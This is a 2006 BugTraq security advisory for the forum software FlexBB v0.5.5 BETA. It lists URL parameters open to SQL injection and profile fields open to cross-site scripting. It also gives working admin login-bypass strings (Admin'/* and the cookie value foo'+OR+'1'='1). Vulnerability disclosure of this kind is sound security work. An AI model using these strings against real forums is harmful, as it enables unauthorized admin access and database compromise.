Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
BugTraq
FlexBB v0.5.5 BETA [SQL Inj] [XSS] [Login bypass] Apr 16 2006 04:07PM
kr4ch web de
App: FlexBB v0.5.5 BETA
Advistory by: p0w3r - curse-crew.de

SQL Inj:
magic_quotes_gpc = off
/index.php?page=showprofile&id=1'[SQL]/*
/index.php?page=forums&forumid=1'[SQL]/*
/index.php?page=viewthread&threadid=1'[SQL]/*
/index.php?page=editpost&threadid=1'[SQL]/*

Login bypass:
magic_quotes_gpc = off
Nick: Admin'/*
PW: foo
PW Hash in "flexbb_password" Cookie

Login bypass[Cookie]:
magic_quotes_gpc = off
flexbb_username: Admin
flexbb_password: foo'+OR+'1'='1
loggedin: TRUE

XSS:
"User CP"->"Edit Profile"
ICQ: [XSS] & '[SQL]/*
AIM: [XSS] & '[SQL]/*
MSN: [XSS] & '[SQL]/*
Google Talk: [XSS] & '[SQL]/*
Website Name: [XSS] & '[SQL]/*
Website Address: [XSS] & '[SQL]/*
Email Address: [XSS] & '[SQL]/*
Location: [XSS] & '[SQL]/*
Signature: [XSS] & '[SQL]/*
Sub-Titles: [XSS] & '[SQL]/*

[ reply ]




 

Privacy Statement
Copyright 2009, SecurityFocus